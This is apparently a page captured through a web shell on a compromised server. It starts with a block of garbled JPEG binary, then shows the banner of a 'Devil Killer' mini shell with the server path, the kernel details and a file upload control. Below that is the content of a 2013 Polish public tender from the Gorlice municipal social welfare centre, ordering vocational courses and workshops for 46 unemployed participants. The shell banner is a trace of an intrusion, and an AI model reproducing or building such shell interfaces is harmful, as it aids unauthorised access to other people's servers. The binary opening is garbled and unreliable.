JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130429/170912-N-2013.html

<p class="kh_header"><b>Gorlice: Organizacja, przygotowanie i przeprowadzenie  warsztatów-kursów z zakresu przygotowania zawodowego osób bezrobotnych, nieaktywnych zawodowo, zatrudnionych w rolnictwie z terenu Gminy Gorlice w ramach Projektu pn. Szansa pracy nadzieją na lepsze jutro realizowanego przez Gminny Ośrodek Pomocy Społecznej w Gorlicach na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 170912 - 2013; data zamieszczenia: 29.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Gorlicach , ul. Łukasiewicza 6, 38-300 Gorlice, woj. małopolskie, tel. 18 353 75 74, faks 18 373 75 74.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja, przygotowanie i przeprowadzenie  warsztatów-kursów z zakresu przygotowania zawodowego osób bezrobotnych, nieaktywnych zawodowo, zatrudnionych w rolnictwie z terenu Gminy Gorlice w ramach Projektu pn. Szansa pracy nadzieją na lepsze jutro realizowanego przez Gminny Ośrodek Pomocy Społecznej w Gorlicach na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia:
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie warsztatów i  kursów dla 46  uczestników projektu Szansa pracy nadzieją na lepsze jutro realizowanego przez Gminny Ośrodek Pomocy Społecznej w Gorlicach na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
Przedmiot zamówienia obejmuje następujące warsztaty i kurs 
1.Warsztaty treningu umiejętności psychospołecznych ,trening rozwoju osobistego, dla 46 osób
2.Warsztaty poradnictwa zawodowego oraz aktywnego poszukiwania pracy, dla 46 osób
3.Szkolenie z poradnictwa psychologicznego dla 6 osób
4.Kurs Sprzedawca z obsługą kas fiskalnych i programów komputerowych dla 13 osób
5.Kurs  Opiekunka dziecięca, dla 8 osób 
6.Kurs Kelner barman  z obsługą kas fiskalnych, dla 11 osób
7.Kurs Magazynier z obsługą programów komputerowych  i wózków jezdniowych, dla 5 osób
8.Kurs dla początkujących spawacz, dla 9 osób
Miejsce realizacji zamówienia: zaleca się, aby zajęcia teoretyczne i praktyczne odbywały się na terenie miasta Gorlice od poniedziałku do piątku, przy czym nie mogą trwać dłużej niż do godz. 15.00. Dzienny wymiar godzinowy zajęć nie może przekroczyć 8 godzin dydaktycznych 1 godzina  45 minut, z zastrzeżeniem, że w trakcie realizacji zajęć dłuższych niż 2 godziny dydaktyczne Wykonawca zapewni po każdych 2 godzinach przerwę 15 minutową.  Zamawiający dopuszcza możliwość przeprowadzania szkoleń  kursów poza wskazanym powyżej miejscem. W takim przypadku jeżeli odległość od Miasta Gorlice przekracza 1 km Wykonawca zapewni również transport, tj. dojazd do miejsca szkolenia spod budynku Gminnego Ośrodka Pomocy Społecznej  w Gorlicach  oraz powrót pod ten budynek. W przypadku, gdy szkolenie warsztaty kurs odbywa się w odległości uniemożliwiającej codzienny dojazd i powrót uczestnika,  Wykonawca zapewni nocleg i całodzienne wyżywienie na własny koszt. 
II. Zamawiający nie dopuszcza możliwości prowadzenia kursów metodą e learning.
     III. Wykonawca zobowiązany jest ponadto:

1)zapewnić do przeprowadzenia zajęć teoretycznych i praktycznych odpowiednio dostosowane pomieszczenia (wraz z zapleczem sanitarnym) wyposażone w:
a)odpowiednią do liczby osób biorących udział w kursie ilość miejsc siedzących i stolików,  
b)flipchart tablica klasyczna magnetyczna, 
c)inny niezbędny sprzęt umożliwiający właściwą realizację kursów.  
d)zapewnić kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe i uprawnienia o ile przepisy prawa nakładają obowiązek ich posiadania,  
2)zapewnić dla każdego uczestnika na własność  komplet materiałów pomocniczych ćwiczeniowych np. płyty CD DVD, podręczniki bądź inne opracowania tematyką nawiązujące do przedmiotu poszczególnych kursów. Sposób oznakowania tych materiałów zostanie uzgodniony pomiędzy Zamawiającym a Wykonawcą przed rozpoczęciem kursów,
3)zapewnić dla każdego uczestnika kursu ubezpieczenie NNW w trakcie jego trwania a także  w drodze na nie i z powrotem na kwotę minimalną 5.000 zł. Kserokopię dokumentu potwierdzającego ubezpieczenie Wykonawca przedłoży Zamawiającemu wraz z fakturą VAT rachunkiem po zakończeniu kursów. 
4)zapewnić bezpieczeństwo osób uczestniczących w kursach, a także warunki pracy zgodnie z przepisami bezpieczeństwa i higieny pracy,
5)skierować wszystkie osoby zgłoszone do udziału w poszczególnych kursach zawodowych na badania lekarskie przez  lekarza medycyny pracy niezbędne do orzeczenia o braku przeciwwskazań  do udziału w kursie (przed rozpoczęciem kursu), a osoby  wytypowane do udziału w kursach opiekunka dziecięca i kelner barman dodatkowo na badania sanitarno epidemiologiczne,
6. zapewnić dla każdego uczestnika kursu odzież ochronną jeżeli wymaga tego specyfika kursu, dla uczestników kursów  Kelner  barman ,Opiekunka dziecięca , Obsługa suwnic z poziomu roboczego , Magazynier z obsługą  programów komputerowych i obsługą wózków jezdniowych  zajęcia praktyczne  zorganizować w punktach umożliwiających  nabycie umiejętności praktycznych,           
7.zorganizować i przeprowadzić po zakończeniu każdego z kursów egzamin sprawdzający stopień opanowania materiału   
będącego przedmiotem poszczególnych kursów, 
8.prowadzić odrębną dokumentację przebiegu każdego kursu obejmującą w szczególności: dziennik zajęć edukacyjnych     
zawierający wymiar godzin i tematy zajęć edukacyjnych; protokół z egzaminu sprawdzającego, rejestr wydanych   zaświadczeń lub innych dokumentów potwierdzających ukończenie kursu i uzyskanie umiejętności, ankieta lub test  przed i po zakończeniu wsparcia
9.zapewnić każdemu uczestnikowi gorący posiłek (obiad jedno daniowydrugie danie oraz napój), a także zapewnić w      
trakcie realizacji zajęć poczęstunek  wszystkim uczestnikom w postaci: świeże ciastka lub drożdżówki, paluszki, w 
 nieograniczonej ilości kawę, herbatę, cukier, śmietankę do kawy,
10.telefonicznie informować Zamawiającego o nieobecności uczestników kursów na zaję ciach,
11.przekazać uczestnikom kursów informację o współfinansowaniu przedmiotowych zajęć ze środków Europejskiego        Funduszu Społecznego, 
12.oznaczyć pomieszczenia, w których odbywać się będą zajęcia teoretyczne, i praktyczne poprzez umieszczenie materiałów informacyjnych dostarczonych przez Zamawiającego przed rozpoczęciem zajęć,
13.umożliwić pracownikom Zamawiającego przeprowadzenie kontroli prawidłowości realizacji kursów oraz poddać się 
ewentualnej kontroli Instytucji Wdrażającej (Wojewódzki Urząd Pracy w Krakowie), a także udzielać stosownych
  
       wyjaśnień w obszarze związanym z przedmiotem zamówienia, na każde jej żądanie.

IV. Zamawiający zastrzega, w uzasadnionych przypadkach, prawo zmiany liczby uczestników poszczególnych kursów.  
     Zamawiający zapłaci za faktyczną liczbę osób, które rozpoczęły kursy z uwzględnieniem w/w zapisu.

V. Po zakończeniu poszczególnych kursów Wykonawca zobowiązany jest wystawić dla każdego uczestnika:
  
zaświadczenie o jego ukończeniu, według wzoru określonego w Rozporządzeniu Ministra Edukacji Narodowej z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).
certyfikat, którego wzór i ologowanie zostanie ustalone po podpisaniu umowy.  
Opis zakresu merytorycznego przedmiotu zamówienia
Zakres merytoryczny kursu
Wymiar godzinowy
(1 godzina  45 minut)
Wymagania dodatkowe
Warsztaty treningu umiejętności psychospołecznych ,trening rozwoju osobistego dla 46 osób

MODUŁ Teoretyczny dla  46 osób
1.funkcjonowanie w społeczeństwie kompetencje społeczne(etapy wejścia w środowisko ludzi pracy, kompetencje społeczne a sukces w pracy zawodowej ,rozumienie organizacji, kontaktu i kariery
1.rozwój osobisty: budowanie celów życiowych, znaczenie siły pozytywnego myślenia, kim ja jestem a kim chcę  być? ,jak poprawić zachowanie psychiczne ,rozpoznawanie złych wyobrażeń o samym sobie-proces zmian
2.komunikacja społeczna : równowaga wewnętrzna oparta na dobrej komunikacji , budowanie własnego wizerunku poprzez komunikacje, komunikacja wyznacznikiem kompetencji umiejętności społecznych, budowanie dobrych stosunków międzyludzkich, asertywność -uczenie się odpowiedzi na trudne pytania
3.umiejętności społeczne :sztuka panowania nad stresem, zachowania w trudnych sytuacjach 
20 godzin  zajęcia grupowe
Termin realizacji maj  2013 r
Wykonawca zapewni:
1.Salę i specjalistyczny sprzęt dydaktyczny ,bezzwrotne materiały piśmienne (notes ,długopis), które należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, emblematem Unii Europejskiej  z podpisem Europejski Fundusz Społeczny,
2.Wykonawca prowadzi nadzór wewnętrzny nad szkoleniami ,przeprowadza ankietę na dzień rozpoczęcia i zakończenia szkolenia i dostarcza je Zamawiającemu,
3.Wykonawca prowadzi dziennik zajęć 
4.Szkolenie winno zakończyć się egzaminem sprawdzającym stopień opanowanie wiedzy a po egzaminie wydaniem zaświadczenia
Warsztaty poradnictwa zawodowego oraz aktywnego poszukiwania pracy  dla 46 osób
MODUŁ  teoretyczny dla 46 osób , 
a) motywacja do pracy
b)autoprezentacja własnej osoby
c)planowanie czasu wolnego
d)pisanie CV i listu motywacyjnego
67 godzin, dla 46   
osób,w tym:
20 godzin zajęć teoretycznych dla całej grupy  
46 godzin konsultacji
indywidualnych po1 godz. dla każdego uczestnika 
Termin realizacji: maj 2013r
Wykonawca zapewni sprawny sprzęt komputerowy wraz z niezbędnym oprogramowaniem i wyposażeniem. Ilość sprzętu, o którym mowa wyżej musi być adekwatna do liczby uczestników kursu.
Wykonawca prowadzi nadzór wewnętrzny nad szkoleniami ,przeprowadza ankietę lub test  na dzień rozpoczęcia i zakończenia szkolenia i dostarcza je Zamawiającemu
Magazynier z obsługą programów komputerowych i wózków jezdniowych dla 5 osób
MODUŁ I: teoretyczny (30 godzin), z zakresu 
a)organizacja stanowiska i miejsca pracy
magazyniera zgodnie z przepisami BHP
i ppoż.
b)aopatrzenie i zakup towarów w jednostce handlu hurtowego,
c) organizacja gospodarki magazynowej,
d) towaroznawstwo, rozmieszczenie i przechowywanie towarów w jednostkach handlu hurtowego,
e) profesjonalna obsługa klienta z wykorzystaniem  aktywnych metod sprzedaży
f) obsługa reklamacji
MODUŁpraktycznoteoretyczny (60 godzin), obejmujący w szczególności: 
a)typy stosowanych wózków jezdniowych,
b)budowa wózka,
c)czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy z wózkami,
d)wiadomości z zakresu ładunkoznawstwa
e)wiadomości z zakresu BHP
f)praktyczna nauka jazdy
g)wiadomości o dozorze technicznym
MODUŁ III: praktyczny (15 godzin),
 obejmujący w szczególności:
a)obsługa programu komputerowego do fakturowania i programu   magazynowego,
105 godzin dla  grupy 5 osób
Termin realizacji:czerwiec  sierpień 2013 r
60 godzin dla grupy 5 osób
Termin realizacji: czerwiec  sierpień 2013 r
15 godzin dla grupy 5  osób
Termin realizacji: czerwiec  sierpień2013r
Wykonawca zapewni:
1).Salę i specjalistyczny sprzęt dydaktyczny ,bezzwrotne materiały piśmienne (notes ,długopis), które należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, emblematem Unii Europejskiej  z podpisem Europejski Fundusz Społeczny,
2.Wykonawca prowadzi nadzór wewnętrzny nad szkoleniami ,przeprowadza ankietę lub test na dzień rozpoczęcia i zakończenia szkolenia i dostarcza je Zamawiającemu
3.Wykonawca prowadzi dziennik zajęć 
Osoby kończące kurs otrzymują  zaświadczenie (certyfikat)  ukończenia, które uprawnia do podjęcia pracy w zakresie kierowania wózkami widłowymi .
Wykonawca zapewni:
1)warunki lokalowe, sprzęt komputerowy wraz z odpowiednim oprogramowaniem i dodatkowym wyposażeniem umożliwiającym sprawdzenie nabytej przez uczestników wiedzy teoretycznej. 
2)Szkolenie winno zakończyć się egzaminem sprawdzającym stopień opanowanie wiedzy a po egzaminie wydaniem zaświadczenia
Kurs kelner barman z obsługą kas fiskalnych dla  11 osób
MODUŁ  teoretyczno-praktyczny 90godzin), obejmujący: 
1)poznanie zasad BHP,
2)sylwetka barmana i zasady obsługi Konsumentów,
3)poznanie terminologii i funkcjonowania sprzętu barowego,
4)poznanie techniki i psychologii sprzedaży
5)alkohole i napoje mieszane,
6) napoje gorące- techniki  sporządzania,
7)obsługa gości,
8)obsługa komputerowych systemów barowych i kas fiskalnych
90 godzin dla grupy 11 osób
Termin realizacji: czerwiec  sierpień 2013 r
Wykonawca zapewni:
1.Salę i specjalistyczny sprzęt dydaktyczny ,bezzwrotne materiały piśmienne (notes ,długopis), które należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, emblematem Unii Europejskiej  z podpisem Europejski Fundusz Społeczny,
2.Wykonawca prowadzi nadzór wewnętrzny nad szkoleniami ,przeprowadza ankietę na dzień rozpoczęcia i zakończenia szkolenia i dostarcza je Zamawiającemu,
3.Wykonawca prowadzi dziennik zajęć 
4.Szkolenie winno zakończyć się egzaminem sprawdzającym stopień opanowanie wiedzy a po egzaminie wydaniem zaświadczenia
5.Wykonawca zapewni bezpłatne materiały do praktycznej nauki
Poradnictwo  psychologiczne, dla 6  osób

MODUŁ teoretyczny obejmujący w szczególności:
a)nabycie umiejętności radzenia sobie ze stresem
b)przezwyciężanie trudności życiowych,
c)nabycie umiejętności komunikowania i  skutecznego porozumiewania,
d)umiejętność budowania prawidłowych relacji
w rodzinie , i w otoczeniu,
e)zwiększenie zaufania we własne siły
16 godzin dla 6 osób  w tym :10 godzin spotkania grupowe i 6 godzin
 spotkania indywidualne 1 godz . dla każdej osoby 
Termin realizacji:maj  2013 r
Wykonawca zapewni:
1.warunki lokalowe,
2.wykonawca prowadzi nadzór wewnętrzny nad szkoleniami ,przeprowadza ankietę na dzień rozpoczęcia i zakończenia szkolenia i dostarcza je Zamawiającemu,
Kurs dla początkujących na uprawnienia w zakresie spawania łukowego w osłonie CO2 i mieszanek(MAG) oraz  w osłonie gazów nieaktywnych MIG  dla 9 osób
MODUŁ : teoretyczno praktyczny  obejmujący w szczególności:
a)zastosowanie elektryczności do spawania łukowego
b)urządzenia spawalnicze
c)bezpieczeństwo i higiena pracy ,bezpieczna praca na hali produkcyjnej
d)materiały dodatkowe do spawania
e)spawanie w praktyce
f)oznaczanie i wymiarowanie spoin
g)metody przygotowania złączy do spawania
h)kwalifikowanie spawaczy
i)budowa i użytkowanie urządzeń do spawania elektrodami
j)podstawowe wiadomości o stalach nierdzewnych ,metody spawania, ochrona zdrowia
k)spawalność, złącza spawane i odkształcenia złączy ze stali nierdzewnych
l)materiały dodatkowe do spawania stali nierdzewnych
ł)korozja i obróbka cieplna po spawaniu
150 godzin dla 9 osób
Termin realizacji: czerwiec sierpień 2013 r   
Słuchacz po ukończonym kursie powinien otrzymać zaświadczenie o ukończeniu kursu zgodnie ze wzorem MEN
Szkolenie winno zakończyć się egzaminem sprawdzającym stopień opanowanie wiedzy i umiejętności  a po egzaminie wydaniem zaświadczenia.
Kurs Opiekunka dziecięca  dla 8 osób
MODUŁ teoretyczno ( 30 godzin)
obejmujący w szczególności:
a)podstawowe zagadnienia dot. rozwoju i wychowania dziecka,
b)podstawy psychologii rozwojowej,
c) zasady i metody wychowania dziecka,
d)wpływ zabawy na rozwój dziecka,
e)przygotowanie i dobór pomocy do zabaw,
f )rodzaje i propozycje zajęć 
g)pierwsza pomoc dzieciom w nagłych wypadkach
MODUŁ praktyczny ( 60 godzin)
obejmujący:
a)potrzeby biologiczne małego dziecka,
b)opieka nad dzieckiem,
c)żywienie  małych dzieci,
d)wypoczynek małego dziecka, spacer, hartowanie ,sen,
e)organizacja zabaw
90 godzin dla 8 osób
Termin realizacji: czerwiec sierpień 2013 r
60 godzin dla  8 osób
Termin realizacji: czerwiec  sierpień 2013 r
Wykonawca zapewni:
1)Salę i specjalistyczny sprzęt dydaktyczny ,bezzwrotne materiały piśmienne (notes ,długopis), które należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, emblematem Unii Europejskiej  z podpisem Europejski Fundusz Społeczny,
2.Wykonawca prowadzi nadzór wewnętrzny nad szkoleniami ,przeprowadza ankietę lub test na dzień rozpoczęcia i zakończenia szkolenia i dostarcza je Zamawiającemu
3.Wykonawca prowadzi dziennik zajęć.
4.Szkolenie winno zakończyć się egzaminem sprawdzającym stopień opanowanie wiedzy i umiejętności  a po egzaminie wydaniem zaświadczenia.
Kurs Sprzedawca  z obsługą kas fiskalnych i programów komputerowych , dla 13 osób
MODUŁ teoretyczny (30 godzin)
 obejmujący w szczególności:
a)przepisy prawne i BHP związane z zawodem
   sprzedawcy,
b)elementy towaroznawstwa handlowego,
c)poznanie dokumentacji związanej ze sprzedażą oraz gospodarką magazynową:
dokumentacja handlowa, magazynowa, 
rozliczenia i dokumentacja finansowa
d)obsługa klienta z wykorzystaniem    
aktywnych metod sprzedaży
MODUŁ praktyczny ( 40 godzin )
obejmujący;
obsługę kas fiskalnych:
a)podstawowe pojęcia fiskalne,
b)rodzaje płatności na kasie fiskalnej,
c)sprzedaż na kasie fiskalnej,
d) obrót towarami zwrotnymi,
e)wykonywanie raportów fiskalnych
f)praktyczne ćwiczenia sprzedaży z 
zastosowaniem kasy  fiskalnej,
obsługa programów komputerowych
do fakturowania i gospodarki magazynowej:
a)ewidencja kontrahentów,
b)ewidencja towarów, cen i marż,
c)rejestr sprzedaży i zakupów,
d)wystawianie faktur,
e) kontrola stanów magazynowych
70 godzin dla grupy  13 osób
Termin realizacji:czerwiec  sierpień  2013 r
40 godzin dla grupy  13 osób
Termin realizacji:czerwiec  sierpień  2013 r
Wykonawca zapewni:
1).Salę i specjalistyczny sprzęt dydaktyczny ,bezzwrotne materiały piśmienne (notes ,długopis), które należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, emblematem Unii Europejskiej  z podpisem Europejski Fundusz Społeczny,
2).Liczbę kas fiskalnych i stanowisk komputerowych adekwatna do liczby uczestników
3).Wykonawca prowadzi nadzór wewnętrzny nad szkoleniami ,przeprowadza ankietę lub test na dzień rozpoczęcia i zakończenia szkolenia i dostarcza je Zamawiającemu
4.Wykonawca prowadzi dziennik zajęć 
Kurs Obsługa suwnic z poziomu roboczego, dla 1 osoby
MODUŁ teoretyczno - praktyczny
(30 godzin) obejmujący :
a)ogólne wiadomości o dźwignicach:
 -klasyfikacja suwnic,
 -charakterystyka suwnic,
b)budowa i działanie,
c)elementy i zespoły suwnic,
d)zagrożenia przy suwnicach,
e)eksploatacja
f)obsługa zawiesi,
g)zajęcia praktyczne
30 godzin dla  1 osoby 
Termin realizacji:czerwiec sierpień  2013 r
Wykonawca zapewni:
1).Salę i specjalistyczny sprzęt dydaktyczny ,bezzwrotne materiały piśmienne (notes ,długopis), które należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, emblematem Unii Europejskiej  z podpisem Europejski Fundusz Społeczny,
2).Szkolenie winno zakończyć się egzaminem sprawdzającym stopień opanowanie wiedzy i umiejętności  a po egzaminie wydaniem zaświadczenia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna posiadanie przez Wykonawcę aktualnego wpisu do Rejestru Instytucji Szkoleniowych prowadzonych przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, zgodnie z art. 22 ust. 1 ustawy z dnia 20 kwietnia 2008r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jedn. Dz.U. z 2008r. Nr 69  poz. 415 z późn. zm.)  ocena tego warunku nastąpi na podstawie złożonego w tym zakresie oświadczenia  załącznik Nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie trzech ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania co najmniej czterech zamówień, odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia przez co zamawiający rozumie realizację  kursów i lub szkoleń z zakresu przygotowania zawodowego o tematyce zgodnej z rodzajem kursów szkoleń warsztatów wyszczególnionych w niniejszym zamówieniu , z podaniem ich wartości, nazwy zleceniodawcy, terminu realizacji (według wzoru stanowiącego załącznik nr 5 do SIWZ, a także załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie (opinie, referencje, rekomendacje wystawione przez poprzednio zamawiających).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku Zamawiający uzna pisemne oświadczenie Wykonawcy w tym zakresie art.22 ust.1 ustawy (załącznik nr 3 do  SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku, zamawiający uzna wykazanie przez Wykonawcę osób (kadra zawodowa  według wzoru stanowiącego załącznik nr 6 do SIWZ) mających uczestniczyć w realizacji przedmiotu zamówienia, które to osoby muszą posiadać kwalifikacje zawodowe niezbędne do realizacji zamówienia tj: 	
Trener psycholog lub osoba posiadająca uprawnienia do prowadzenia szkoleń z zakresu umiejętności psychospołecznych, minimum 3 letnie doświadczenie w pracy terapeutycznej.
